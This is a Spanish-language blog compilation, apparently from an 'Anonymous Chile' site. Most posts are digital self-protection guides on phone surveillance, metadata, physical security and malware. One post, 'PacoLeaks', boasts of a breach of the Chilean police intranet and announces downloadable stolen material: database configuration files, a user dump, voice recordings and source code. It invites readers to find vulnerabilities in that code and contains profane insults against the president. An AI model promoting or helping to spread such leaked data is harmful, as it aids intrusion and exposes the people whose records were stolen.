Con la popularidad de los teléfonos celulares se instaló una forma efectiva y barata de operar la vigilancia. Cuando hacemos una llamada telefónica o enviamos mensajes, se registran al menos la ubicación de quien llama y quien contesta, los números de teléfono, la posición geográfica, la hora y duración de la comunicación y los números de serie de los dispositivos utilizados. De igual manera pueden ser capturados los datos de nuestras comunicaciones vía las aplicaciones de los teléfonos inteligentes.

Una amenaza móvil

En un mismo aparato se vinculan los datos del número telefónico, correo, contactos, actividad en redes sociales, SMS, fotografías, archivos, datos de GPS y a veces la sincronización con otros equipos.

En México, por ejemplo, con la Ley Telecom, las empresas telefónicas están obligadas a tener un registro de estos datos y esta información puede ser utilizada por la Secretaría de Gobernación, el ejército, la marina o la policía federal sin que un juez tenga que autorizarlo, lo cual significa una flagrante violación a nuestra privacidad, que el gobierno intenta normalizar banalizando el tema, mientras que en Chile por años se aproximó una situación similar o aún peor con el TPP y el proyecto de vigilancia ciudadana mediante drones en las calles de la ciudad de Santiago. Las personas que nos observan no necesitan saber con precisión lo que hemos dicho, pueden llegar a conclusiones sólo analizando los metadatos que nuestras comunicaciones producen durante un tiempo y la comunicación cifrada no protege al 100% de este nivel de vigilancia si tu aparato o dispositivo se encuentra comprometido localmente. Siempre es menester tener cartas bajo la manga, siempre contar con precauciones más avanzadas y fuertes tanto como nuestros conocimientos y habilidades nos lo permitan.

¡No te paralices, actúa!

Tengamos presente que tanto la seguridad digital como los mecanismos de vigilancia están en constante cambio; por ello tenemos un compromiso de actualización y documentación permanente. Adecuemos nuestros hábitos a los niveles de riesgo que implique nuestra actividad o nuestras relaciones cercanas.

Si el teléfono es nuestra herramienta de trabajo, el contacto con nuestra familia o amigos, y utilizamos gran cantidad de servicios y aplicaciones, tal vez nos sea difícil prescindir de él; sin embargo podemos dificultar esas prácticas de espionaje, control y vigilancia. Con cierto conocimiento técnico, escoger modelos de teléfonos que puedan funcionar con sistemas basados en Android Open Source Project como LineageOS (Cyanogenmod), CopperheadOSJ Paranoid Android, Mokee, Resurrection Remix o Replicant, nos puede dar la posibilidad de utilizar el celular sin los servicios ni la vigilancia de Google. También es posible cifrar el dispositivo para alojar datos sensibles con menos riesgo como nuestra clave privada de GPG y las llaves públicas de nuestra agenda.

Es posible que utilizar un dispositivo móvil con radio CDMA, GSM, 3G 0 4G revele nuestra posición geográfica.

Podemos instalar y usar aplicaciones que nos permitan cifrar nuestras comunicaciones, como Signal, Wire, Briar u Orbot. Telegram no es del todo software libre, no recomendamos usarlo para comunicaciones privadas ya que es un medio centralizado en servidores de código privativo. Apoyemos colaborativamente a proyectos de hardware abierto e infraestructura de comunicaciones libres.

Compartamos estas recomendaciones con nuestros contactos para extender nuestra red de confianza y privacidad. Cuidar la privacidad de nuestras comunicaciones también es un acto solidario. Si sólo unas cuantas personas cifran sus llamadas serán más notables. Cuando nos sumamos a la tarea de cuidar nuestras comunicaciones en colectivo, ayudamos a formar un bloque para proteger a las personas que más lo necesitan.

65 comentarios

PacoLeaks: Anonymous Chile revela información crítica de Carabineros de Chile

Publicada el 16/11/2019 - 05/08/2021 por Anonymous Chile

Conjunción de hackers con un fin: Molestar al de arriba.

Primero, algunos dudan bastante en la veracidad y en si los archivos estan infectados o no.
La primera es mas fácil de aclarar, pero si quisiesemos dejar la veracidad total, sería interesante describir con mas detalle el éxito del ataque (cómo se hizo), aunque llevaría tiempo hacerlo. Quizás se haga.

Ahora, a algunos creen que vienen archivos infectados.
¿Cual sería nuestro fin infectando archivos? ¿Hackearlos a ustedes? LOL.
De todas maneras, pueden subirlos a virus total y comprobar uno a uno cada archivo.

Segundo, suceden cosas extrañas con este tema.
Suspendieron TODAS las cuentas que estaban difundiendo esto.
Nuestros defaces no duran nada, los bajan en tiempo record, al parecer la prensa y los de arriba no quieren que esto se haga muy grande, que pena.

Ahora, ¿Como fue que MenteMalicia logró entrar a la red interna?
Develar los secretos de un mago, no lo hace merecerse el titulo.
No hubo ningún «ayudante interno» ni un proveedor de servicios que haya facilitado el acceso. Todo fue hecho desde 0.

Por cierto, en el archivo «instructivos.zip», incluimos el archivo de configuracion de las bases de datos del DOE.
La cual, por cierto, es inútil, ya que al ser parte de la red interna, es imposible conectarse desde fuera.
El objetivo de aquello es que los mismos administradores, el gobierno y los carabineros, se den cuenta de que SÍ hubo un hackeo y que esto es real.
No es necesario dar mas explicaciones.

Además conversaciones de voz de los pacos, para que vean que clase de cosas se vienen en los archivos adjuntos :P.

Y también un dump de los usuarios de la intranet del DOE.
(Van a salir con la weá de que no sirven otra vez, y estan en lo correcto, a ustedes no les sirve de ninguna weá)
Lo importante es que, los Carabineros, la Prensa y el Gobierno, se tome esta mierda en serio.
No estamos jugando, su «Inteligencia» es una basura.

¿Así piensan proteger al país? ¿Donde está la Dirección de Inteligencia (DIPOLCAR)? ¿Donde está la ANI?
¿Con esta seguridad?
¿Enviando mensajes de clasificacion SECRETA en un servidor así?
¿Dejando acceso a la Reforma Procesal Penal al alcance?

¿No queremos la Reforma Procesal Penal hackeada verdad tio piñi?
¿No queremos espionaje cibernetico a Chile verdad tio?
¿O si queremos ver todos los datos expuestos a internet?
¿No verdad?
O tal vez sería buena idea para el tio piñera, compartir los datitos con el extranjero, seguro se lleva bien con el resto del mundo
como para querer compartir mensajes secretos con agencias de inteligencia de otros paises.

No sea weón.

Disfruten del código fuente 😉
El que descubra en que punto hay una vulnerabilidad (hay varios), se gana un premio :*

– MenteMalicia – RebelSide –

«Ahora los weones celebrando la convocatoria como si el logro fuese de ellos solamente porque fue una marcha pacífica. Queda claro una vez más que hay que dejar la zorra para que nos escuchen, por que de lo contrario estos culiaos sonríen y se vuelven a hacer los weones pensando que están dominando al pueblo una vez más.
Piñera culiao, chupalo, la marcha era contra ti y todo tu gabinete de mierda, no te des el gusto de incluirte en el pueblo, porque el pueblo lo único que quiere es verte arder, viejo culiao.»

Descarga PacoLeaks

Anonymous Chile, somos los de abajo apuntando a los de arriba.

No a la retención de datos

Publicada el 01/06/2019 - 14/08/2021 por Anonymous Chile

Vigilancia masiva del Estado: «Asesinamos a gente basándonos en metadatos»
– Michael Hayden, exdirector de la CIA y NSA

Los metadatos se componen de toda la información asociada al tráfico de nuestras comunicaciones que no sea el contenido mismo de los mensajes. Quienes nos observan no necesitan saber con precisión lo que hemos dicho, pueden llegar a conclusiones analizando solo los metadatos que nuestras comunicaciones producen con el tiempo. El principal asesor legal de la Agencia de Seguridad Nacional estadounidense (NSA), Gral. Stewart Baker refirió: «Los metadatos te dicen absolutamente todo acerca de la vida de alguien. Si tienes suficientes metadatos, realmente no necesitas el contenido [de sus comunicaciones]». La ley Telecom y la retención de metadatos aumentan los riesgos de persecución, espionaje y hostigamiento para activistas, periodistas y participantes en movimientos sociales. Imagínate los siguientes escenarios:

  • Nuestro historial de búsqueda en Google y páginas web que visitamos, incluyendo cuánto tiempo pasamos en cada una, podrían utilizarse para identificarnos como simpatizantes de una ideología perseguida por el Estado.
  • El historial de los destinatarios, remitentes, y asunto de nuestros correos electrónicos podrían señalar nuestra participación en un movimiento contra la minería y el despojo del territorio.
  • Además de crear un historial de llamadas y mensajes SMS, los teléfonos móviles emiten datos sobre nuestra ubicación geográfica. Pueden revelar el hecho de que fuimos parte de una manifestación contra la criminalización de la protesta o señalar que estamos reunidos con un grupo de defensores de los derechos humanos investigando un crimen de Estado.
  • En caso de una detención arbitraria, nuestra listas de contactos, historial de «me gusta», tuits y publicaciones en las redes sociales podrían ser tergiversados para incriminarnos.
  • Los metadatos que se guardan en imágenes, videos, archivos PDF y documentos de texto, incluyendo la hora y fecha de la creación/ modificación del archivo podrían ser utilizados para identificar a periodistas o comunicadorxs independientes que preferimos ser anónimxs.

Cuando se trata de temas sensibles la comunicación en persona siempre es más segura. Pero para el uso cotidiano, o si la situación exige comunicarnos por Internet o teléfono consulta sugerencias de herramientas en:

  • EFF autoprotección digital https://ssd.eff.org/
  • Prism Break https://prism-break.org/
  • Privacy Tools: https://privacytools.io/

Protege tu información de amenazas físicas

Publicada el 01/06/2019 por Anonymous Chile

Nos esforzamos mucho para proteger la información que está o pasa a través de nuestros dispositivos digitales. Pero todo ese trabajo puede deshacerse en un instante si uno de esos dispositivos se pierde, lo roban, adulteran, confiscan o se echa a perder. Algunos ejemplos de esto pueden ser un bolso que olvidamos en un bus, una unidad de respaldo que se queda en una oficina cerrada sin llave, una computadora pública no confiable o un vecino con buena vista que mira sobre nuestro hombro. Estas y otras amenazas físicas pueden llevar a que información delicada se pierda o quede expuesta.

Una cuidadosa evaluación de riesgos, un esfuerzo constante por mantener un ambiente de computación saludable y una política de seguridad escrita pueden ayudarte a evitar este tipo de desastres. Aunque no trabajes en una organización formal, es una buena idea escribir guías y planes de respuesta para ti y quienes trabajan contigo.

Evalúa tus riesgos

Las Organizaciones y las personas a veces subestiman la importancia de mantener sus oficinas y equipos a salvo. Incluso quienes toman medidas para proteger hardwares, como computadoras y dispositivos de respaldo, de robos, de climas extremos y otras amenazas físicas suelen no documentar estos pasos en una política de seguridad escrita. Elaborar esas políticas puede requerir aportes de varias personas, y mantenerlas puede consumir mucho tiempo. Sin embargo, estas actividades son extremadamente valiosas, en parte porque ayudan a asegurar que no se dejen de lado detalles pequeños pero importantes.

Muchas organizaciones tienen buenos candados en las puertas de sus oficinas, por ejemplo, pero muy pocas tienen una lista actualizada de cuántas llaves se crearon y a quiénes se las dieron. Los documentos con las políticas son una manera de llegar a un consenso de esos detalles y una manera de registrar esos detalles a lo largo del tiempo. Para crear una política de seguridad que sea útil, primero deberás evaluar los riesgos y vulnerabilidades que enfrentas y valorar las diversas maneras en que tu información se puede perder o ver en riesgo y considerar el impacto. Conforme a esto:

  • Ten en cuenta los canales de comunicación que usas y cómo los usas. Los ejemplos pueden incluir cartas, faxes, teléfonos móviles, teléfonos fijos, correos electrónicos, Skype, redes sociales y plataformas de mensajería seguras, por nombrar algunas.
  • Ten en cuenta cómo guardas información importante o delicada. Discos duros de computadoras, correo electrónico, servidores web, memorias USB, discos duros externos, CD, DVD, teléfonos móviles, papel impreso y notas a mano son los medios más comunes de guardar datos. En cada caso, asegúrate de saber si los datos están cifrados o no y quién tiene acceso a las llaves y contraseñas necesarias para descifrarlas.
  • Ten en cuenta dónde se ubican esos artículos físicamente. Pueden estar en la oficina, en casa, en el equipaje de alguien, en un contenedor de reciclaje o, cada vez más, «en algún lugar de internet». En este último caso, puede ser difícil determinar la ubicación real, física de una información particular.
  • Ten en cuenta cómo destruyes datos delicados cuando ya no los necesitas. Muchos trituradores de papel funcionan bien con CD y DVD como con documentos de papel. Muchos taladros y la mayoría de martillos funcionan con discos duros.

Ten en cuenta que una información determinada puede ser vulnerable de diferentes maneras. Así como puedes confiar en software para proteger el contenido de una unidad de memoria USB de software malicioso, debes confiar en un detallado plan de seguridad física para proteger la misma información de robos, pérdida o destrucción. Algunas prácticas, como tener una buena política de respaldo externo, son útiles contra amenazas digitales y físicas, mientras otras son más específicas.

Cuando optas por llevar una unidad de memoria USB en tu bolsillo y no en una bolsa plástica sellada en el fondo de tu equipaje, estás tomando una decisión sobre seguridad física, aunque la información que tratas de proteger sea digital. Como suele ser, la política correcta depende en gran parte de la situación. ¿Estas recorriendo la ciudad o cruzando una frontera? ¿Será otra persona quien cargue tu bolso? ¿Está lloviendo? Estas son las preguntas que debes tener en cuenta al tomar decisiones como esta.

Crea tu política de seguridad física

Luego de evaluar las amenazas a las que puedes ser vulnerable, debes considerar lo que estás haciendo actualmente — y qué pasos adicionales puedes dar — para mejorar tu seguridad física y la seguridad de tu información. Analiza estos pasos con otros, anotarlos y revisarlos de vez en cuando es una buena manera de mantener una política de seguridad detallada. La mayoría piensa en políticas de seguridad en el contexto de una organización o una oficina, pero muchos de los mismos principios se aplican a personas, familias y redes informales.

El documento de tu política debe brindar guías generales para ti, para quienes trabajan contigo y, de ser pertinente, para los recién llegados a tu organización. También contener una lista de acciones a tomar como respuesta a diversos incidentes potenciales. Esto es particularmente importante porque el estrés y el caos de una emergencia de seguridad física puede hacer que sea difícil responder rápida y adecuadamente. Tener un punto de partida bien documentado puede ayudar a evitar estas parálisis. A todos los involucrados se les debe dar tiempo suficiente de leer la política, hacer preguntas al respecto, colaborar e implementar las normas y prácticas que describe.

Tu política de seguridad contendrá diversas secciones, dependiendo de las circunstancias. Algunos ejemplos pueden incluir:

  • Una política de acceso a la oficina referida a la distribución de llaves, cámaras de circuito cerrado de televisión, sistemas de alarma, contrato de limpieza y otras consideraciones similares.
  • Una política de invitados, que incluya qué partes de la oficina deben quedar restringidos a visitantes autorizados.
  • Un inventario de tus equipos, que incluya número de serie y descripciones físicas.
  • Una política de cómo desechar de manera segura la basura de papel que contenga información delicada.
  • Una política de cómo retirar información digital de dispositivos que ya no se usan.
  • Una política sobre uso de dispositivos personales para el trabajo.
  • Información sobre acceso a asistencia legal.

Es probable que tu política se refiera también a prácticas relacionadas con viajes. Algunos ejemplos pueden incluir:

  • Cómo interactuar con personal de migraciones y de seguridad en las fronteras en diversas circunstancias.
  • Políticas de «sistema de compañerismo» para viajes a regiones conflictivas que incluyan qué hacer si un colega no se registra como estaba planeado.
  • Políticas relacionadas con datos o software delicados que pueden considerarse incriminatorios.
  • Información sobre seguros de viaje, de ser pertinentes.

Los procedimientos de respuesta a emergencias pueden incluir:

  • A quién contactar en casos de incendios, inundaciones u otros desastres naturales.
  • Cómo reaccionar ante un robo o una incursión en la oficina.
  • Cómo contactar a las organizaciones que dan servicios como energía eléctrica, agua y acceso de internet.
  • Qué medidas tomar si se pierde o roba un dispositivo.
  • A quién se debe notificar si se revela o extravía información delicada.
  • Cómo recuperar información del sistema de respaldo externo.
  • Cómo llevar a cabo algunas reparaciones claves de emergencia.

Estos documentos de políticas deben guardarse de manera segura, hacerles frecuentes copias de respaldo y revisarlos para asegurarse que estén actualizados.

Protege tu información de intrusos físicos

Personas maliciosas que busquen acceder a tu información delicada — o a hardware valioso en donde se guarda esta información — representan una amenaza física clave. Hay varias medidas que puedes tomar para ayudarte a reducir el riesgo de invasiones físicas. Las categorías y sugerencias a continuación son meramente una base sobre la cual deberás elaborar de acuerdo con tu propio ambiente de seguridad.

Cerca de tu casa u oficina

Las consideraciones de seguridad van más allá de las habitaciones y edificios dentro de los cuales vives y trabajas. A continuación, te presentamos algunas sugerencias para ayudarte a proteger tus datos de amenazas en las zonas circundantes.

  • Conoce a tus vecinos. Dependiendo del clima de seguridad donde trabajas, esto puede brindarte una de dos oportunidades. Si tienes suerte, tus vecinos serán aliados que pueden ayudarte a no perder de vista tu casa u oficina. Si no la tienes, serán parte de la lista de potenciales amenazas que debes abordar.
  • Revisa cómo aseguras las puertas, ventanas y otros puntos de entrada que lleven a tu casa u oficina.
  • Evalúa instalar sensores de movimiento o cámaras de circuito cerrado de televisión alrededor de tu oficina. Este tipo de vigilancia tiene consecuencias en la privacidad de quienes trabajan en o cerca del edificio, pero puedes ser una manera efectiva de captar evidencia de un robo o una incursión en la oficina, particularmente si las cámaras están configuradas para transmitir video a una ubicación fuera de la oficina. Por supuesto, esos videos deben estar cifrados, tanto en tránsito cómo en el lugar en que se almacenen.
  • Trata de crear una zona de recepción donde se puedan reunir con los visitantes cuando entren a la oficina, y un salón de reuniones que esté separado del espacio de trabajo habitual (si trabajas fuera de casa, esto puede significar que traslades documentos y equipo a un dormitorio u otro espacio privado cuando te reúnas con visitantes). Evita dejar Ethernet o puertos USB accesible de esas áreas «públicas» de tu oficina. Esto incluye puertos en dispositivos como impresoras, monitores y proyectores que estén en lugares donde los visitantes podrían quedarse solos.
  • Es importante que elijas una contraseña fuerte para tu red inalámbrica para que otros no puedan unirse a tu red o supervisar tu tráfico. Si tu red inalámbrica depende de una contraseña débil — o funciona sin contraseña — cualquiera en las cercanías es un intruso potencial. No debes pensar en esto como seguridad física, sino como un atacante que puede unirse a tu red inalámbrica que tiene el mismo acceso que alguien que puede entrar a hurtadillas a tu oficina y conectar un cable ethernet. Los pasos precisos para asegurar una red inalámbrica dependerán de tu punto de acceso, pero debes buscar la configuración de una contraseña WPA2.
  • Cuando configures tu red inalámbrica, evalúa ponerle un nombre que no te identifique claramente, ni a tu organización ni la ubicación de tu punto de acceso.
  • Muchos puntos de acceso te permiten crear una red inalámbrica separada para invitados. Al hacerlo así, puedes darles a tus visitantes acceso a internet sin darles a conocer tu contraseña ni autorizarlos a acceder a dispositivos locales cuando estén en las cercanías.
  • Ten cuidado de unidades de memoria USB que puedas encontrar. A menudo, las personas se sienten tentadas de conectar dispositivos de almacenamiento desconocidos en sus computadoras para ver si pueden averiguar de quién pueden ser. Lamentablemente, esos dispositivos son una fuente común de software malicioso. En algunos casos, esparcen software malicioso adquirido de computadoras infectadas en las que se han usado previamente. En otros casos, los atacantes los crean intencionalmente y los «dejan caer» cerca de la casa u oficina de una persona u organización específica.

Dentro de tu casa u oficina

Tanto los ataques criminales o con motivaciones políticas pueden tener razones para estar tras tus datos. Pueden estar buscando información financiera, datos delicados relacionados con tu trabajo o detalles personales que usan para intimidarte, chantajearte o hacerse pasar por ti. Los ataques de delincuentes o con motivaciones políticas suelen ser difíciles de distinguir, y los intentos de obtener datos sensibles a menudo parecen intentos de robar hardware valioso. Por lo tanto, es importante tomar precauciones donde vives y donde trabajas.

A continuación, algunas recomendaciones sobre cómo proteger tus datos dentro de tu casa o oficina:

  • Si vives con otras personas o compartes una oficina con otra organización, conversa con ellos sobre seguridad. Trata de determinar qué comportamiento pueden esperar entre ustedes y con los visitantes.
  • Evalúa comprar una caja fuerte para tu computadora personal o un gabinete con candado o cerrojo para documentos y equipos delicados.
  • Averigua qué protecciones legales tienes contra las autoridades, arrendadores y otros terceros que puedan querer entrar a tu casa u oficina.
  • Evita tender cables de Ethernet fuera del edificio para evitar que quienes tengan llaves los adulteren cuando el edificio esté vacío.
  • De ser posible, deja cerrado con llave equipos de redes como servidores, enrutadores, interruptores y módems dentro de una habitación segura o un gabinete con llave. Un intruso con acceso físico a ese equipo puede instalar software malicioso que puede robar datos en tránsito o atacar otras computadoras en tu red.
  • La mayoría de armazones de las computadoras de escritorio tiene una ranura donde puedes conectar un candado que le hará más difícil entrar a alguien que no tengo la llave. Deberías evaluar esta característica al adquirir hardware.
  • Usa cables de seguridad que se cierren con llave, donde sea posible, para evitar que los intrusos se roben computadoras de escritorio o portátiles.
  • Por lo general, estamos rodeados de equipos que consideramos que son televisores, cámaras, teléfonos, impresoras, consolas de juegos de video y otros dispositivos de Internet de las Cosas (IoT, por su nombre en inglés). En algún punto, todas estas «cosas» son computadoras, y vienen con muchos de los mismos riesgos. Simples hábitos físicos — como cubrir los lentes de las cámaras y desconectar «dispositivos inteligentes» cuando no estén en uso — pueden ayudar a veces. Pero siempre debes pensarlo dos veces antes de conectar un equipo nuevo a la red de tu casa u oficina.

En tu escritorio o cubículo

Hay varios buenos hábitos de seguridad que atañen al lugar específico donde trabajas.

  • Posición de la pantalla de tu computadora para evitar que otros lean lo que aparece. Recuerda tener en cuenta las ventanas, puertas abiertas, áreas de espera de visitantes y otras consideraciones similares.
  • Evalúa adquirir filtros de privacidad para tus dispositivos. Los filtros de privacidad hacen que sea difícil leer una pantalla a menos que la tengas directamente frente a ti. Están disponibles para computadoras portátiles, monitores externos, tabletas y teléfonos inteligentes.
  • Si trabajas con documentos en papel o dejas notas físicas para ti, sé consciente de qué información es accesible en tu escritorio. Calendarios de papel, organizadores, agendas, directorios telefónicos y notas autoadhesivas son inmunes al software malicioso, pero también son imposibles de cifrar. Si los roban, copian o fotografían, pueden revelar información extremadamente delicada.

En espacio públicos

Pocas personas trabajan exclusivamente en sus casas y oficinas. A continuación, algunas sugerencias relacionadas con trabajar en espacios públicos:

  • Evita usar computadoras portátiles y teléfonos móviles en espacios públicos, a menos que tengas razones para creer que estás a salvo. Y trata de evitar poner esos dispositivos a la vista cuando no los estés usando. Evalúa llevar tu laptop en algo que no parezca el estuche de una computadora portátil.
  • Ten tus dispositivos móviles, incluida tu computadora portátil, contigo en todo momento cuando viajes o te quedes en un hotel. Evalúa viajar con un cable de seguridad y practica encontrar espacios de trabajo cerca de objetos en los que puedes conectarlo. Los ladrones suelen aprovechar la hora de las comidas y visitas a los baños para robar equipos sin supervisión de habitaciones de hotel y cafés, respectivamente.
  • Cuando trabajes en público, es todavía más importante que cuides la posición de tu pantalla para que nadie más la pueda leer. Si trabajas en público con frecuencia, debes comprar filtros de privacidad para los dispositivos de uses.
  • Los espacios públicos suelen tener redes inalámbricas inseguras. Aunque se haya configurado una contraseña fuerte, otras personas en la misma red tienen la capacidad de vigilar tu actividad en internet y leer los datos no cifrados que envías y recibes. Cuando trabajes en ambiente así, debes usar una red privada virtual (VPN, por su nombre en inglés) o el navegador del enrutador cebolla para evitar estos ataques.

Software y configuraciones relacionadas con seguridad física

A continuación, algunas sugerencias sobre cómo configurar tu software para hacerlo menos vulnerable a amenazas físicas:

  • Cuando reinicies tu computadora, asegúrate de configurar una contraseña para el inicio de sesión.
  • Cifra el almacenamiento en todas tus computadoras, tabletas y teléfonos inteligentes.
  • Si tienes servidores en tu oficina, trabaja con quien los mantenga para asegurarte de que la información que contengan estará cifrada si los apagan o desconectan.
  • Acostúmbrate a cerrar tu pantalla cada vez que te alejes de tu computadora. Todas las computadoras Windows, Mac y Linux tienen atajos del teclado que te permiten hace esto rápida y fácilmente.
  • Habilita el bloqueo de pantalla en tu teléfono inteligente para que las personas con acceso físico a tu dispositivo no pueden ver los contenidos tan fácilmente.
  • Hay algunas configuraciones en el BIOS de tu computadora que son relevantes a la seguridad física. Primero, debes configurar tu computadora para que no arranque desde tu dispositivo USB, o unidades de CD-ROM o DVD. Segundo, debes configurar un grupo de contraseñas en el propio BIOS, para que un intruso no pueda simplemente deshacer la configuración mencionada arriba. Como siempre, asegúrate de elegir una contraseña fuerte.
  • Si usas un administrador de contraseñas para recordar las contraseñas de inicio de sesión y BIOS para una computadora en particular.
  • Si tu teléfono inteligente, tableta o computadora portátil tiene la función «Encuentra mi dispositivo», evalúa activarla para que puedas ubicar el dispositivo o borrar remotamente su contenido si lo pierdes, te lo roban o lo confiscan.

Mantener un ambiente saludable para tu equipo

Las computadoras, equipos en red y dispositivos de almacenamiento de datos pueden ser bastante frágiles. Lo mismo ocurre con las cámaras de circuito cerrado de televisión, impresoras, «dispositivos inteligentes» y otro hardware que instalamos en y cerca de nuestra casa y oficina. Los dispositivos como estos no siempre se adaptan bien a energía eléctrica inestable, temperaturas extremas, polvo, humedad, agotamiento mecánico y otros riesgos similares.

Las fluctuaciones eléctricas, como sobrecarga de energía, apagones y bajones de tensión pueden causar daño físico a las computadoras y otros dispositivos digitales y dañar los componentes electrónicos o destruir datos en los discos duros.

Hay varias cosas que puedes hacer para proteger tu equipo de esas amenazas:

  • Como mínimo, todos los equipos electrónicos deben estar conectados a protectores de sobrecargas. No todos los enchufes múltiples con interruptor contienen protectores de sobrecargas, así que debes revisar esto cuando equipes tu casa u oficina. Un protector de sobrecarga debe especificar un voltaje máximo y una lista de escalas en joules. Si tu suministro de energía es particularmente inestable, tal vez necesites también un filtro de energía o un acondicionador de línea.
  • Si puedes adquirirlos, evalúa instalar Sistemas de Alimentación Ininterrumpida (UPS) y usarlos en vez de protectores de sobrecargas comunes. Un UPS estabilizará tu suministro de energía y dará energía temporal en caso de un apagón. Son particularmente valiosos para servidores locales y computadoras de escritorio que no tienen batería interna.
  • Trata de usar enchufes eléctricos que tengan líneas de tierra. Cuando te mudes a otro lugar, trata de probar el suministro de energía antes de enchufar un equipo importante. Si funciona deficientemente con lámparas, luces y ventiladores, tal vez debería pensarlo dos veces antes de usarlo para dar energía a tus computadoras.

La energía irregular es solamente una de muchas amenazas ambientales que debes tener en cuenta al configurar. A continuación, sugerencias adicionales:

  • Evita colocar hardware importante en lugares de fácil acceso como pasillos y áreas de recepción o cerca de una ventana. Ubica los protectores de sobrecargas, UPS, enchufes múltiples con interruptor y cables de extensión donde no pueden ser desenchufados ni apagarse por tropiezos accidentales.
  • Cuando tengas acceso a cables de computadora de alta calidad, protectores de sobrecarga y enchufes múltiples con interruptor, evalúa elegir algunos adicionales. Enchufes múltiples con interruptor chispeantes que se caen de los enchufes de la pared y no logran tener los enchufes seguros son bastante comunes en algunos lugares del mundo. También son muy peligrosos (incluso antes de que los empiecen a «arreglar» con cinta aislante).
  • Si guardas una computadora funcionando en un gabinete, asegúrate de que tenga una ventilación adecuada para evitar que se sobrecaliente. El equipo de computación no debe estar cerca de radiadores, conductos de calefacción, acondicionadores de aire u otros ductos.

Lectura adicional

+ Ver el Manual de Seguridad Holística y el Manual de capacitadores holísticos para saber más sobre la importancia de integrar seguridad física, digital, psicosocial y organizacional en tus políticas y prácticas.

+ Ver Frontline Defenders Workbook on Security para consejos prácticos sobre cómo crear una política de seguridad.

26 comentarios

Protege tu dispositivo de software malicioso y phishing

Publicada el 01/06/2019 por Anonymous Chile

Independientemente de tus principales objetivos, conservar tu dispositivo saludable es el primer y esencial paso hacia una mejor seguridad. Antes de preocuparte mucho sobre el cifrado de datos, comunicación privada y navegación anónima, por ejemplo, debes proteger tu dispositivo de software malicioso. El software malicioso puede reducir dramáticamente la efectividad de cualquier otra precaución de seguridad que puedas tomar.

Aunque la mayoría de los software malicioso se siguen dirigiendo en contra de computadoras con sistemas operativos de Windows, los usuarios de Mac, GNU/Linux, Android e iOS también están en riesgo y deberían revisar las tácticas presentadas aquí.

Software malicioso y ataques de phishing

Hay muchas maneras de clasificar el software malicioso, pero conocer los diversos nombres aplicados al software malicioso hace muy poco para ayudarnos a evitarlo. Virus, software espía, gusanos, adware, botnets, troyanos, piratas informáticos, ransomware, rootkits y cryptojackers son algunos tipos de software malicioso, como lo son algunos ataques de phishing. Algunos tipos de software malicioso se difunden por internet a través del correo electrónico, mensajes de texto, páginas web maliciosas y otros medios. Algunos se esparcen a través de dispositivos como unidades de memoria USB que se usan para intercambiar datos. Y, aunque algunos software malicioso requieren que un objetivo desprevenido cometa un error, otros pueden infectar silenciosamente sistemas vulnerables sin que la víctima haga nada.

Introducción al software malicioso

Por lo general, los ataques de software malicioso se consideran generales o específicos.

Software malicioso en general

Algunos softwares maliciosos son creados o comprados por delincuentes, que luego liberan en internet y ayudan a propagarlos ampliamente como sea posible para ganar dinero. Esto puede incluir software malicioso que busca los números de tarjetas de crédito en tu dispositivo y lo envían de vuelta al delincuente. Otros softwares maliciosos se hacen cargo de tu computadora y lo usa para extraer criptomonedas o interactuar con anuncios en línea para aprovechar redes de anuncios de pago por clic. También existen softwares maliciosos diseñados para infectar los dispositivos a los que las víctimas estén conectadas. Esto puede incluir «electrodomésticos inteligentes» (Internet de las Cosas) conectados a internet en tu casa o dispositivos vulnerables que usan personas cuyas direcciones de correo electrónico están guardadas en tu computadora. Esas redes de máquinas «zombies» infectadas a veces se usan para crear botnets que a veces se alquilan para ataques de denegación de servicio (DDoS) y otras actividades criminales o perversas.

Cabe referirse algo más acerca del ransomware, tanto porque últimamente ha estado en alza como también por sus características únicas. El ransomware es un software malicioso que cifra tus archivos y exige dinero a cambio de desbloquearlos. A diferencia de la mayoría de los softwares maliciosos, suele informar a sus víctimas en cuanto quedan afectadas. Debido a esto, hacer copias de respaldo frecuentes de tus archivos puede limitar en gran medida el daño que causa el ransomware (algunas investigaciones sugieren que los archivos se recuperan solamente la mitad de las veces, aunque se pague el rescate). Evidentemente, es importante tener una buena estrategia de copias de respaldo cuando te recuperes de cualquier tipo de softwares maliciosos, pero la advertencia oportuna que brinda la mayoría de ransomwares significa que es poco probable que hayan corrompido tus copias de respaldo mientras estabas infectado.

Software malicioso dirigido

El software malicioso dirigido se usa normalmente para interferir o espiar a una persona, organización o red en particular. Los delincuentes habituales usan estas técnicas, pero también las usan los servicios militares y de inteligencia, terroristas, acosadores en línea, cónyuges abusivos, actores políticos oscuros, padres preocupados y empleadores sin ética. Es probable que los ataques dirigidos incluyan mensajes cuidadosamente personalizados, información falsa del remitente, adjuntos con nombres de archivo apropiados en el contexto, acceso físico a dispositivos específicos y otros trucos similares. También es más probable que aprovechen vulnerabilidades de ataque de día cero, los cuales son fallas de software relativamente poco comunes que mantienen en secreto para que sigan siendo efectivos hasta en dispositivos completamente actualizados.

Stalkerware, o software de acoso, es un ejemplo de software malicioso específico que permite a los atacantes vigilar las actividades de sus víctimas. Estos ataques suelen estar diseñados para obtener datos de ubicación, información de mensajería y acceso a funciones de los dispositivos, como cámaras y micrófonos. Están muy asociados con violencia y acoso de parejas, pero también se venden a padres y empleadores.

Normalmente, es mucho más difícil defenderse contra el software malicioso, no solamente por su sofisticación, sutileza técnica y nivel de personalización, sino porque quienes eligen usarlo suelen ser más persistentes. Si crees que alguien podría estar dirigiéndose específicamente hacia ti, es aun más importante todavía que revises las sugerencias que enumeramos a continuación en evitar infecciones de software malicioso y que protejas tu información de amenazas físicas.

Herramientas y medios de defensa contra el software malicioso

Lamentablemente, a la fecha no existen herramientas contra el software malicioso con funciones completas de código libre. Sin embargo, si usas Windows debes echar un vistazo al Windows Defender incorporado. Las computadoras Mac y GNU/Linux no tienen defensas contra el software malicioso incorporado. Lo mismo pasa con los dispositivos Android e iOS, que son algo menos vulnerables porque normalmente evitan la instalación de software a menos que venga de una fuente oficial como la tienda de aplicaciones de Google, F-droid o la tienda de aplicaciones de Apple.

También puedes instalar una herramienta confiable y de uso gratuito como Malwarebytes (Windows, Mac, Android) y Avast (Freeware – ¡Peligro!). La mayoría de los productos anunciados como «Anti-malware» para iOS son en realidad otra cosa: VPN, administradores de contraseñas, rastreadores contra robos y otras herramientas de «seguridad».

